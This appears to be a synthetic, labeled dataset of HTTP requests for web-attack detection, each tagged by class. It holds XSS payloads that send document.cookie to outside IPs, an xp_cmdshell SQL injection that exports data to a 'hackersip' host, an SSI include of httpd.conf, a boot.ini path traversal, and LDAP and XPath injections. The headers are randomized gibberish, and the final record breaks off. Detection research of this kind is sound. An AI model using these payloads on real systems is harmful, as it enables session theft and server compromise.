Upgrade: eet/8.2, womym/1.9, Orius/4.0, orvtl/1.7, sae7/5.2
Warning: 706 www.bha5ea.gif "rttdDznEnnn" 
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 34361564811
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41809
Start - Id: 48914
class: XPathInjection
GET /mc5nzowr/WeQIkv/yjwI1Sm9/tlmbl1rnL/rbFa/iuhrragDl/eEggEqaftodeI.shtml?sfrpMsetcass8=94++or+++++1%3C++++ctwi%2Fdi%2Fgh%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D18%5D+++or+++0565%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27 HTTP/1.1
Host: www.jnnp.org
Connection: close
Accept: image/png
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: o-ncnt
Cache-Control: only-if-cached
Client-ip: 33.184.179.137
Cookie: wvg5Dte0atxl=f5n;Bct=77926247;eau=e1etC trmhiqAot
Cookie2: $Version="504"
Date: Mon, 12 Jun 06 07:01:35 UTC
ETag: W/"DEMXpzK3ZKUSrwpqiv9"
Expect: 100-continue
From: nui8@hgERemx.net
If-Modified-Since: Fri, 06 Aug 04 01:19:57 UTC
If-Unmodified-Since: Sun, 12 Jun 05 19:26:37 GMT
If-Match: "T@_sxNfq59Hr3pi"
If-None-Match: "Mx5c7grfboP61gEoTKpR"
If-Range: Tue, 03 Mar 09 17:52:06 GMT
Max-Forwards: 2362
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: sl6ayt DetlmT=oon8z2
Authorization: Digest cnonce="dRpveie"
Range: 87-22
Referer: /nqdur1sd/ltr0.cgi
TE: gzip;q=0.7,trailers,gzip;q=0.4
Trailer: Warning
User-Agent: mw_EdTafN http://www.ehrinf.ch
UA-CPU: PowerPC
UA-Disp: 8730,583,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 508x349
Via: 1.8 www.emgf.css, FTP/8.3 www.oyma.shtml, 9.4 169.243.240.192
Transfer-Encoding: deflate
Upgrade: ltr/8.5, jsTkgd/0.2
Warning: 099 www.eSitghtc.htm "2nttveexd" "Tue, 21 Sep 04 15:34:20 CET"
X-Forwarded-For: 1.220.148.94
X-Serial-Number: 566436568089581
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48914
Start - Id: 48217
class: XSS
POST /t0rwWbeNDO_dM82gIh/e6zGuuALWdsmOGC6j.aspx? HTTP/1.0
Content-Length: 268
Content-Language: aogNes
Content-Encoding: gzip
Content-Location: /n2irToeo/a3ddip3/tTejcte/burno.mpeg
Content-MD5: b2FrczdwN25zYW1uT2tocg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 05 Dec 09 06:43:16 GMT
Host: www.eesht5soo.de:80
Connection: close
Accept: video/*, image/png, application/postscript
Accept-Charset: koi8;q=0.2, ks_c_5601-1987;q=0.9, x-mac-chinesetrad;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 48.97.29.144
Cookie2: $Version="426"
Date: Sun, 14 Oct 07 16:54:01 UTC
From: mcitnbOr@s4Xde.gov
If-Modified-Since: Tue, 24 Feb 09 11:22:35 CET
If-Unmodified-Since: Sat, 26 Feb 05 01:12:19 GMT
If-Match: "pjYPo@8O0.fz47-LD"
If-None-Match: "2CKxIJxA7Zi6QnuM9@A"
If-Range: "x9tswjEQStIOCI_"
Max-Forwards: 822
Pragma: no-cache
Proxy-Authorization: Basic YWVhdHRxZzphc2ViaQ==
Authorization: eiheo htnv=doAtceb
Range: 3713-
Referer: http://6ve0orna.st/elesnc/ysea/iopieblr/nhca/ylhawwo.tiff
TE: chunked,gzip,chunked
Trailer: Accept-Charset
User-Agent: <meta    http-equiv=  "    refresh  " content    =   "     0;url=javascript:    [window.open('http://242.33.108.210/itse.php3'+document.cookie);]     ">
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 7334x400
Via: 1.5 24.145.44.19, FTP/3.6 www.rsrvnt.css, 4.5 219.11.63.145
Transfer-Encoding: deflate
Upgrade: eremce/4.3, xnzi/0.6, 6tgf/7.0, eal3Sa/3.7, tio/8.3
----: -------------------------

7ivsnbtdtsdaifr=saLrklhrgetwmaoZes&au8ZbetweenZWxep=$6esgqRab<&aTe=47990&yne2nrltheaoIkt= eer(hygthh&sd9rtch=eQudOn&d4=z&eOl8roThhso=81&ae4a=7335102&mO1@h-g=09501&tnatd2lijPt9l0e=4u6lpjLu7s&5Eelkct7btYneke=rhojTgfimoe20nws9&ahrY3temil=101401&notNi5htitk=teeeh ic

End - Id: 48217
Start - Id: 47514
class: XSS
GET /sj8yXh6mH/h7NI6xVk/0r28c-/uOCZ@L4LumKXV9D@/osn3SDTZBNzbr0.Ey8/emlsefRrE/iMJ3Okyr/null9J9Wu2E9/ebQ-bdCwnkKhojC@/TXcJ7/8mpeedseaeuahm/uncposition@KvAk.php4?5uo3mahax=17808&feeaeuRsotEstde=06&cIlqrneyneem=wia8&naodr8ii=n+ac00arftpaco&EcmdDb=4&.Wwj=970763571&baa=e9hHrozEu&nzsPswoak4bhxr=a1agsetdpoe&dfEeqrreduonaed=aJYR&l4h4b4eval=%3Cbody+++onload+%3D++++%22%5Bwindow.open%28%27http%3A%2F%2F26.179.236.47%2Fto.nsf%27%2Bdocument.cookie%29%3B%5D++%22%3E&epeth=+eri HTTP/1.1
Host: www.manrey.net:8085
Connection: cotmas
Accept: text/*
Accept-Charset: windows-1252, x-mac-ce;q=0.9, x-mac-japanese, iso-2022-jp;q=0.4, koi8-r;q=0.6
Accept-Encoding: 
Accept-Language: sxRb-Ru5R7vtt;q=0.3, l5Nf2e-thein3, neZ-i, 4tee-rD, 9deu-edoh
Cache-Control: no-store
Client-ip: 68.134.125.108
Cookie: erRiegenr=987;e6sisast2=tsoavlo6t
Cookie2: $Version="7"
Date: Mon, 22 Oct 07 14:59:04 UTC
ETag: W/"T.nifG87SHPiwpM4.IO4"
Expect: 100-continue
From: eudn2a@se5tse.com
If-Modified-Since: Fri, 02 Jun 06 23:46:46 CET
If-Unmodified-Since: Tue, 16 Oct 07 02:44:56 CET
If-Match: "sAKpW32jE60bjvhCLn"
If-None-Match: "tr.rxuFMUAUEWJ7aM"
If-Range: *
Max-Forwards: 9
MIME-Version: 9.4
Pragma: lRetr='hhobli'
Proxy-Authorization: NTLM cnV0MXk0aWFpbmhhcm5jeGFvcWh2bnJsaEFpbTU4bmxucmJ0b2ll
Authorization: NTLM M0xpZWUxb0JjeGhmbG96NHBoaWN0d295QW0xcGFuc3I=
Range: 20-409392,508-532
Referer: http://be4t.com/plinlg/sdox/ipgakd.exe
TE: trailers,deflate;q=0.0
Trailer: Range
User-Agent: Mozilla/2.2 (compatible; as7oh2yp; Solaris; s9ta6; marxlare)
UA-CPU: PowerPC
UA-Disp: 076,499,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7841x155
Via: 7.7 114.224.208.33
Transfer-Encoding: deflate
Upgrade: atsa/8.3
Warning: 065 134.123.203.94 "ntssttrkginowelli" 
X-Forwarded-For: 71.118.200.104
X-Serial-Number: 870651819
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 47514
Start - Id: 37897
class: LdapInjection
GET /dcnwmje.jpg?n4Rrh8=65%29%28%26%28objectClass%3Do9u0%29%28%7C%28sn++%3D++onrd%29%28cn%3Dce++J*%29%29&ctoerui1=aNfaaogtctofdf&rLMJwMuD=83&1u3Nlike=%40+o%24fromsfe&fdrhnAreaa=nhs18ahstheiab&abtEesbhtimYitu=004054 HTTP/1.0
Host: 41.18.156.183:964
Connection: close
Accept: audio/*;q=0.2
Accept-Charset: *
Accept-Encoding: identity, compress;q=0.0, identity;q=0.8, compress
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 176.10.100.235
Cookie: eeitcyn7=eXiH
Cookie2: $Version="1"
Date: Thu, 28 Jun 07 07:12:27 UTC
ETag: W/"k_eK26HPsis_XTtOs"
Expect: 4UHf=yc9Ggg;iOlgaObr=Elden
From: pyeere9e@rgid7rnosp.be
If-Modified-Since: Sat, 28 Feb 04 01:30:30 GMT
If-Unmodified-Since: Thu, 22 Apr 04 15:15:02 UTC
If-Match: *
If-None-Match: *
If-Range: "RMgMI-CTfjQkK3iPH"
Max-Forwards: 9
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: viol wsolm=aeyhuO
Range: -375,281-
Referer: http://www.0nia6yoi.gov/iaebur/timrssBr/ghneeo/uignsj/edWyce.shtml
TE: chunked;q=0.8,trailers
Trailer: User-Agent
User-Agent: Mozilla/6.2 (Windows; U; Windows NT 8.9; os-6e; rv:5.3.0) Gecko/53991313
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: HTTP/0.2 119.228.223.248, al0nfh/7.5 185.120.69.131
Transfer-Encoding: gzip
Upgrade: 1tena/5.3
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 146.237.137.95
X-Serial-Number: 9686105266248523
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37897
Start - Id: 35852
class: XPathInjection
GET /ohvlmX_6GOL3cB4GJ/mpI/I_GGwp-4/pGYEHLqvf/sidt/EnKls/y4dYdAqoHOTrfcUjrd/Eahaohdhs0fsi/ivinmnt1.jpeg?ittzuioc=i8_yY45LXlc&sbs3erEo5sohdi=stylet%25uc2yycekC6&nqVsoienrmnxst=jeqsie&u4W1_Cwmk=sA8mV&odn=h1iyerEamltfiy&neg2retbcret=oqdqzds8lrraw9&otrioc2d=h%2Fci%2FTouesi%2Fchild%3A%3Anode%28%29%5B++position%28%29%3D015%5D+++%7C+++++id%2F31nz%2Feeii%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D39%5D++or++%27etSmat4h%27++%3D+++%27&rpier2e=yBO HTTP/1.0
Host: 234.49.166.200
Connection: close
Accept: image/gif;q=0.1, image/jpeg
Accept-Charset: *
Accept-Encoding: gzip;q=0.0, deflate, identity, gzip;q=0.6, identity
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 177.161.53.181
Cookie: roshst=ddhPeuuf'ara8;bvt=tuWeh;lPhdea=1243929390
Cookie2: $Version="3"
Date: Tue, 24 Oct 06 07:10:17 GMT
ETag: "bhOsZQ9I08QZQJM3GB.5"
Expect: iasENO
From: wcsotyes@fnolepci.st
If-Modified-Since: Mon, 19 Oct 09 08:26:54 GMT
If-Unmodified-Since: Fri, 14 Jan 05 21:20:23 CET
If-Match: "uVEX3euv.sny8oVnf5Sk"
If-None-Match: *
If-Range: "IG_M2_TjEnRTmPZq737_"
Max-Forwards: 06
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Digest username="ioula3"
Authorization: abnceN bi3Xfpat=Fh6tz
Range: -15
Referer: /phhaa6k/e9zt/ThsxY/hzAn/Qaroi.jsp
TE: trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/9.2 (compatible; 5ecn6ss; Solaris; 3geht0i)
UA-CPU: PowerPC
UA-Disp: 747,476,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4135x5853
Via: HTTP/5.6 www.tct9dpg.gif
Transfer-Encoding: identity
Upgrade: ei2y/3.0
Warning: 610 www.24teifwn.png "Opivct0gaEd" 
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 83889853145892267537
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35852
Start - Id: 39852
class: SSI
PUT /Rmpng/selibhr/aMCr3MwAQvmv2FBfZ2/_i5ZIhZMR/q7WU/usr3Q-7uC0mMKOEGZ/o7o8Nnuzabe45_OPs-.swf? HTTP/1.1
Content-Length: 31
Content-Language: h75c,nph
Content-Encoding: gzip
Content-Location: /oieco/morrtDaC/eCmoh585.bin
Content-MD5: OE5ub3NlcmV0Mk1zZW9zZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 02 Oct 05 08:53:21 CET
Last-Modified: Sat, 01 Dec 07 16:03:35 CET
Host: 114.164.249.202:80
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.0, identity;q=0.1, deflate;q=0.2, compress, identity
Accept-Language: keEbrrRe-a2wsgoot;q=0.6, hiEa8a-htc;q=0.5
Cache-Control: max-age=6869
Cookie: wtlap=<!-- #include     virtual="/etc/httpd/httpd.conf"    -->;0aJmeta1xBp8=192256663;nd2P8=ad2me
Cookie2: $Version="360"
Date: Sat, 15 Oct 05 05:07:03 CET
ETag: "wLiY.7unQNW-OTIL"
Expect: 100-continue
From: biu6nh@gel86etaot.com
If-Modified-Since: Tue, 28 Apr 09 13:44:26 GMT
If-Unmodified-Since: Mon, 06 Apr 09 04:21:31 CET
If-Match: "yYANCJsW2Xit2AFk2y"
If-None-Match: *
If-Range: "JW_RsJJ5.JuAmtprbKUb"
Max-Forwards: 2315
MIME-Version: 2.2
Pragma: no-cache
Authorization: NTLM VEl1UnJhbDRobjRnZXBocm1lYW53bHN3bGFpc3JnbXNCdWRldDB1Zw==
Range: 631546-,397-,861-67563
Referer: http://tutbcl.net/dsne.cgi
TE: trailers,trailers,gzip
Trailer: If-Match
User-Agent: hwztindBCX http://www.DEwarv.org
UA-OS: Mac OS X
UA-Color: color32
Via: n0mc/2.1 99.246.181.18
Transfer-Encoding: 0yym; tsnwsr=ates
Upgrade: belta/5.6, eofbei/4.2, r9sto/6.0
Warning: 361 14.205.186.210 "sUfuhrilelbElers" "Sun, 21 Jan 07 21:32:04 GMT"
X-Forwarded-For: 72.181.189.233
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~

ist6ewy7T1ofuo=74911&eH=i4JYSpN

End - Id: 39852
Start - Id: 48278
class: XSS
POST /Ahome9htaccesfc/0rdeuatoja4iyoesga/ko-nR_Ac-GirpAUd/in/e@18wULAUdYOdi5BJgHJ/8ZLpSp/ennmNt5shelxRhispsJn/dx4Qx9/jrv9XoCEi7R9isN1O/s4imeawtlsl/3TRM.mdb? HTTP/1.1
Content-Length: 235
Content-Language: trtrf,mcisz,lo
Content-Encoding: compress
Content-Location: /rsvv/suaa/t8iboqt/t6io.jpeg
Content-MD5: bmRUNmhuNWFodWV0Y2I2eA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 03 Nov 04 24:14:29 UTC
Last-Modified: Fri, 12 Mar 10 08:33:21 GMT
Host: www.tlashivt7.fr
Connection: keep-alive
Accept: */*
Accept-Charset: koi8-r;q=0.9, shift_jis
Accept-Encoding: 
Accept-Language: hsrv-3er, rie-poeos4, u9nsoemo-esEiiin;q=0.6, a4ieYrE-noa;q=0.3
Cache-Control: max-age=6657
Client-ip: 35.43.34.114
Cookie: tts=<div    style   =    "   background-image: url(javascript:    [alert('toeusfi');]);     " >;s9=Ho
Cookie2: $Version="9"
Date: Sun, 17 Oct 04 04:41:40 UTC
ETag: W/"A55c1jnqvoK42TWieF"
Expect: hhtdt=ouads;zylrshd=lhe3ha
From: o1tkn@aiu9re.uk
If-Modified-Since: Mon, 08 Mar 04 04:32:50 UTC
If-Unmodified-Since: Wed, 02 Jul 08 03:34:55 CET
If-Match: "XsN78-G3u5-5@WXz-m"
If-None-Match: "hP2qww5ItHg4iHdFe"
If-Range: *
Max-Forwards: 5702
MIME-Version: 4.4
Pragma: gstdLie='6mdid'
Proxy-Authorization: Basic c2lyY2V0aTpUdDRlNQ==
Authorization: NTLM YmxlZUJBZW9vZWttdHFpYXhSdGVhZXBtZVRhYWVSbDFkckExdGVmcm8=
Range: -598,7754-,230078-655908
Referer: /mateetw/cihzalil/us0h/nvsreco.dll
Trailer: If-None-Match
User-Agent: Mozilla/7.9 (Machintosh; U; PPC Mac OS X 6.8; Ew-0t; rv:6.3.3) Gecko/95365425
UA-CPU: PowerPC
UA-Disp: 2403,5402,16
UA-OS: Win95
UA-Pixels: 715x493
Via: 1.5 www.Sezmr.html
Transfer-Encoding: identity
Upgrade: ems/9.3, nLe/5.9, 8btF/5.6, oSoftr/5.9, s3s/8.4
Warning: 796 216.243.128.207 "wyvotaiefsrgTqlyee3c" 
X-Forwarded-For: 159.98.32.7
~~~~~: ~~~~~~~~~~~~~~

hlklmt=ot6kz&WsiMcass=tOtW1&X3documenth0aWFpG=53&rA=uess&pnho=54967378&stdinClinkchildS5kts8l=i2&noristnneast=nb@PNf8R&Sgdd0l=2387217&Bhelinktej@ulike=a&MItz=iAhtBlTsayssg&iEetdSoene=03082446&9V3YCxjThtacces8Q2=rf.evcOIN&eal=28056354

End - Id: 48278
Start - Id: 41159
class: SqlInjection
GET /ixUoNfksua4fSTCE/li/wOeeh7sibEc7/v4k0RSqAlqhRl/nop0etmamz/c9locii0hcnsiiwnfl/p0NE_EJv/nA1RqyTQZGF9puZH3Xo/oJ/R1echozuG@/tVxhinzeipoT/s0_oDJ.htm?drSe4eyddae5=oihorssl6nwdazEe&rchteoao=4505211&teeeehetgee4nri=%7Cahttpihih8&uonob1ofc5dk3s=w%3Ad&logOjY0BLweKU=8793918&letywesaoT=kufS8K&eeon09f6dcteet=dl&ioege=orzaetsdocument+eyCe%3CuincludersRao&wJuhiaVQ=8&otsjieVi5tdgji=3343&1sj=exec+++xp_cmdshell+++%27bcp++%22select+*+++from+++mEiea%22++++queryout+++pwdump.exe++-c+++++-Craw++++-Shackersip+++-Usa+-Ph8ck3r%27&sa=zl.nhBI&smoamixSOsito=z&ewna=aac0n&oe4sjael=Q+etmpahiNnullq+Se%3B%24HaOa9 HTTP/1.1
Host: www.td1lxd.com
Connection: heet
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: compress, compress, identity;q=0.6, deflate;q=0.6, gzip
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 177.124.117.237
Cookie: uaeepekimfik=n2 N;Ospe=368;dElksoEswlia=s7;taeaujirt9say=r9wroedoIp+2t'xuscripte
Date: Mon, 04 Jan 10 10:42:37 UTC
Expect: 100-continue
From: jrln@tnernm.biz
If-Modified-Since: Sat, 01 Nov 08 14:18:56 UTC
If-Unmodified-Since: Mon, 12 Mar 07 05:56:57 CET
If-Match: "bV_J1hfi.eJREC2hJE"
If-None-Match: "wZBtgO7b3dVsU966_lPy"
If-Range: Fri, 13 May 05 12:20:10 GMT
Max-Forwards: 3887
Pragma: no-cache
Proxy-Authorization: nmtsns c9neqdtn=mecete
Authorization: NTLM dGVzdDdsb3hHcmNkeWFjZHQ4ZHF0c3RlaXhzY3NlczBmaW9kbQ==
Referer: http://www.5ooid.com/ewnhamc.msf
TE: gzip,trailers
User-Agent: Mozilla/2.9 (compatible; Konqueror/9.3; WinNT; aieihu; fjwu)
Via: 8.6 www.Deknr.jpg, HTTP/8.3 www.gorobr.css
Transfer-Encoding: deflate
Warning: 341 www.hatlzo.htm "y5wl" "Thu, 19 Jun 08 12:12:06 GMT"
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41159
Start - Id: 45554
class: PathTransversal
GET /cvb7n/it/tadHc715jTFrAQ4i/w9cgZu_/eh/VrhtdtllWnt.swf?Stiadnnhtk4ri=%28m&wielcCkt73=o%3A%5Cwindows%5Cboot.ini&ctKeou0=n6Zu7xqs HTTP/1.0
Host: www.o3dfd1es.be:5280
Connection: shea
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 194.255.5.167
Cookie: nori=tx8anAA
Cookie2: $Version="087"
Date: Sun, 11 Nov 07 08:18:16 CET
ETag: "kYD21EH765dGrPJFf7j"
Expect: urperzok
From: kccnlkv2@rodignu.de
If-Modified-Since: Sat, 10 Mar 07 12:14:12 CET
If-Unmodified-Since: Fri, 30 Mar 07 09:14:08 GMT
If-Match: "f9VHwgZRm03tTfOvB@u"
If-None-Match: *
If-Range: Tue, 10 Nov 09 23:51:34 GMT
Max-Forwards: 5379
MIME-Version: 3.3
Pragma: roaxneqa='n4fxjtd'
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Digest response="E22F9eE11467e7b1deeE0c6f3c56A53a"
Range: 903-3,3-4324,-8
Referer: /0s8ot/6sln.js
TE: chunked;q=0.8,deflate;q=0.0,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.7 (X11; U; Solaris 6.8; ta-ri; rv:9.7.4) Gecko/20408037
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 220x9820
Via: 7.9 38.83.179.127, 9.1 www.qa2smm.tiff
Transfer-Encoding: Telee; ohtb=Xnfu
Upgrade: tvtmyl/0.9, dEhai/7.5, oiv8C/9.2, beNr/8.8, c9orN/8.6
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 145.196.47.34
X-Serial-Number: 86157391207979195
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45554
Start - Id: 38328
class: LdapInjection
GET /hfwh_wNPBDvE/snii3snylehbmgede/taesu3wfeHh42oeretr/eprSTNtTZ3LN.jpg?VbOLservicesCUkGo=%29%28++%7C++%28itr5%3Dneho*%29&a9ctw=%7ER&St1einl5ks=ywinnt1iooseniaopenaN&or0KJcopyform0yR.JX=ecopy%5Cne&fit8sdti=obZeQw2r&1_5v=264682 HTTP/1.1
Host: www.neehs.gov:80
Connection: yupdoe5
Accept: */*;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: izeGy-wde9h;q=0.2
Cache-Control: no-store
Client-ip: 7.88.170.148
Cookie: ru=8;tesseenehaldd=ocOKh
Cookie2: $Version="689"
Date: Fri, 08 May 09 18:58:26 UTC
ETag: W/"eYKeGvCQslKNy.3T8"
Expect: atq5uIk=lcLmsuZ;i3ece4=Swd7rg
From: ze0mxcoe@eemraasrs.com
If-Modified-Since: Sun, 11 Jan 04 09:10:30 CET
If-Unmodified-Since: Mon, 31 Oct 05 01:33:13 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 879
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: ene3e tBebc=fcidjwou
Range: -717,218781-
Referer: /ynR6sni/brlmdeT/ezls3/dsto/sgifistd.mspx
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: t9u5sh (nSI69Pnb; 9.W1J8O; eP7A0iMpt)
UA-CPU: 68000
UA-Disp: 6615,674,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 6454x625
Via: ahc/4.2 98.75.232.168, 6.1 www.heon7.jpg
Transfer-Encoding: 3Nydke; teyae=enotl
Upgrade: Ev8td4/8.8, eqerk/0.5, erNoe/4.2, ehp/2.5
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 3515531846
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38328
Start - Id: 47629
class: XSS
GET /Pk/Cb0RgeT.png?35cO=zqyv&B_xe.QCNHE.=%3Cimg+++src+%3D%22++javascript%3A%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.eniendit.com%2Fcgi-bin%2Fllanatla.cgi%27%2Bdocument.cookie%29%3B%5D%22++++%3E&_C3IftpO7ZID3=263131462&rhtetbch29l9yl=155&Pu3aIYfg=Aiebh+ HTTP/1.1
Host: 33.105.206.161:80
Connection: keep-alive
Accept: video/mpeg, image/png;q=0.0
Accept-Charset: iso-8859-8;q=0.8, euc-tw;q=0.5, iso-8859-6, x-mac-roman;q=0.3
Accept-Encoding: *;q=0.8
Accept-Language: eOrre-0mtsnq;q=0.2, a-hx57tu
Cache-Control: only-if-cached
Client-ip: 58.158.9.220
Cookie: nhem96d= 6;tmSaa7hsorrac=6131197;e2hdotj1LdSet=o2JS3kK;asngs4sI=d4kperl0;l2=od
Cookie2: $Version="477"
Date: Mon, 08 Mar 04 07:27:03 GMT
ETag: W/"rNt6c_sZROstoX2T"
Expect: 100-continue
From: aampiq@d5vosUe.cz
If-Modified-Since: Sat, 05 Jul 08 09:10:57 UTC
If-Unmodified-Since: Tue, 20 Nov 07 07:43:13 UTC
If-Match: "WZxAhekJ3qSwjf5"
If-None-Match: "BAnmKkNBk6xqA4BRi"
If-Range: "EzQYJ71i7C.P17D"
Max-Forwards: 1082
MIME-Version: 5.8
Pragma: 5iprcsie=0hK
Proxy-Authorization: Digest cnonce="femknga"
Authorization: onc1 ascun=tnayt1d
Range: -1463,157-2
Referer: http://www.eiot9e.st/nsiS/rYe6Hg.nsf
TE: trailers,deflate;q=0.9
Trailer: Expect
User-Agent: Mozilla/6.1 (compatible; MSIE 0.5; Win98; e0o1lnat; mcvortelei)
UA-CPU: StrongARM
UA-Disp: 434,760,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 608x141
Via: 0.1 www.rteuti.jpg
Transfer-Encoding: aa0lr
Upgrade: eok7ht/3.9, 9eex4/3.3
Warning: 297 www.hzbts.tiff "tresi" "Wed, 25 Apr 07 19:25:41 CET"
X-Forwarded-For: 119.112.244.238
X-Serial-Number: 2524902769036083814
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47629
Start - Id: 48643
class: XPathInjection
POST /hodtidueE6s/d9N@_mkM/fnA-Rmls/de/4a2tnwgetzHCE@l/nb.aspx? HTTP/1.1
Content-Length: 216
Content-Language: tiiTi,G
Content-Encoding: compress
Content-Location: /5fnhc5.nsf
Content-MD5: c2w1NDlvYWFpdXJybXRvYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 19 Apr 07 22:41:37 GMT
Last-Modified: Sat, 26 Apr 08 15:17:01 GMT
Host: 53.212.8.250:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: v-elVe;q=0.1, al-Sah
Cache-Control: no-transform
Client-ip: 41.88.127.250
Cookie: i5te1ilie=l%;ncVY5jGupdate.4WU=7%e1<cteopta5oE;tahistmh=oncinBnwirimbsdagt;etiegw=019089;4IA=cmuJuCD;rCQKFvar=f idddxo3
Cookie2: $Version="469"
Date: Mon, 26 Jul 04 23:21:43 UTC
ETag: W/"YKFJkoH9cKAkRI90WU"
Expect: stA2aaa=lrrs7nRs;lnncDcZ
From: eta3@rewxn.biz
If-Modified-Since: Tue, 12 Feb 08 09:14:37 UTC
If-Unmodified-Since: Tue, 28 Sep 04 20:11:58 UTC
If-Match: "sJecmBHBknBckAN3Ivo"
If-None-Match: *
If-Range: *
Max-Forwards: 40
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: NTLM cXRhYXRucm5EaTR0cGR2b2ZubGZlYXR5c3Vob3R0ZWlzZVJvbHMydA==
Authorization: NTLM dWFhdHU2ZTdvaWdpVGVFaWVpZGFlemc1ZW9zZTN0ZW5lc3FVdQ==
Range: -046912,8351-4,007308-22
Referer: /htetahtv/tp1t8/bnlhis/sfeepZT.exe
TE: gzip;q=0.1,trailers
Trailer: Warning
User-Agent: Mozilla/8.6 (Windows; U; Windows NT 4.6; y3-ni; rv:6.5.8) Gecko/70577303
UA-CPU: x86
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 090x151
Via: 3.7 www.0aeagf8i.js
Transfer-Encoding: compress
Upgrade: ohth/5.2
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 36007
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

t3sld3ry=238&sr5=oT24Luor&9A7Ln=(i    < count(tri/child::text())   and j <  count(tic/child::comment())     and   k     < count(ecm/child::*)   )&ni5vnjvDa4d4dsi=1il'

End - Id: 48643
Start - Id: 48215
class: XSS
POST /wPtZRX4sVR_pAa/ioHe8sue.php3? HTTP/1.0
Content-Length: 224
Content-Language: e,ytwitwo
Content-Encoding: compress
Content-Location: /r5tm/j5doOt/gn4iaEuo/oct8uasT.tar
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 05 Dec 09 06:43:16 GMT
Host: www.0cdaarsaBt.org
Connection: close
Accept: video/quicktime, audio/*, image/*;q=0.8
Accept-Charset: koi8;q=0.2, ks_c_5601-1987;q=0.9, x-mac-chinesetrad;q=0.8
Accept-Encoding: 
Accept-Language: <a   href  =   "   about:<s&#99;ript   >[window.open('http://42.178.250.207/ri.exe'+document.cookie);]</script  >     " >
Cache-Control: max-age=7
Cookie2: $Version="426"
Date: Mon, 26 Mar 07 01:22:10 UTC
From: mcitnbOr@s4Xde.gov
If-Modified-Since: Thu, 04 Sep 08 23:39:01 GMT
If-Unmodified-Since: Sat, 26 Feb 05 01:12:19 GMT
If-Match: "pjYPo@8O0.fz47-LD"
If-None-Match: "2CKxIJxA7Zi6QnuM9@A"
Max-Forwards: 8
Pragma: woeYnu='5geihd'
Proxy-Authorization: NTLM TUgyd3R0Zmp3Y3J3aW1zZWZzcmJhczB0dGxUaHJvN3NGZWNlYWV3bmJu
Authorization: eiheo htnv=doAtceb
Range: 3713-
Referer: http://d9gtUu2.ch/r3D1ewuw/naru/kihhcgoh/Eiaalsap.jpeg
Trailer: Cache-Control
